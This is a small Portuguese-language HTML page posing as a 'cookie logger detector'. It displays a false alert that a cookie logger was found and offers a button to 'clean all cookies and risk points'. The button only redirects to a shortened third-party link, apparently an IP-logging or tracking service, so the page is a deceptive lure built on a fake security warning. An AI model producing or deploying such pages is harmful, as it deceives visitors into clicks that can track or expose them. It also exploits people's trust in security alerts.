<!DOCTYPE html>
<html>
<head>
	<title>Detector de cookie logger</title>
	<style>
		.title-box {
			background-color: #1c1c1c;
			border-radius: 10px;
			box-shadow: 0 0 10px rgba(0,0,0,0.5);
			padding: 20px;
			margin: 50px auto;
			max-width: 600px;
			text-align: center;
		}

		.title-box h1 {
			margin-top: 0;
			font-size: 36px;
			font-weight: bold;
			color: #d18694;
		}

		.title-box h2 {
			margin-bottom: 0;
			font-size: 24px;
			font-weight: normal;
			color: #ffffff;
		}
    .button {
			background-color: #4CAF50;
			color: #fff;
			padding: 16px 32px;
			border-radius: 4px;
			font-size: 24px;
			cursor: pointer;
			transition: background-color 0.3s ease-in-out;
		}

		.button:hover {
			background-color: #3E8E41;
		}
	</style>
</head>
<body>
	<div class="title-box">
		<h1>Cookie logger detectado!</h1>
		<h2>Clique no botão abaixo para limpar todos os seus cookies e outros pontos de risco para seu dispositivo!</h2>
    <div class="button-container">
		<button class="button" onclick="window.location.href='https://2no.co/2LWEj6'">Clique aqui</button>
	</div>
	</div>
</body>
</html>